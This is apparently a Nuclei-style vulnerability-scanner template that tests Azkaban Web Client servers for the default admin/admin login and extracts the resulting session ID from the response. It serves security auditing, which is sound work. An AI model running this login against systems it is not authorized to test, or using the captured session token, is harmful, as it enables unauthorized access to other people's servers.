id: azkaban-web-client-default-creds

info:
  name: Azkaban Web Client Default Credential
  author: pussycat0x
  severity: high
  reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
  tags: default-login,azkaban

requests:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=login&username=admin&password=admin

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"session.id"'
          - '"success"'
        condition: and

      - type: word
        words:
          - 'azkaban.browser.session.id'
          - 'application/json'
        condition: and
        part: header

      - type: status
        status:
          - 200

    extractors:
      - type: kval
        kval:
          - azkaban.browser.session.id
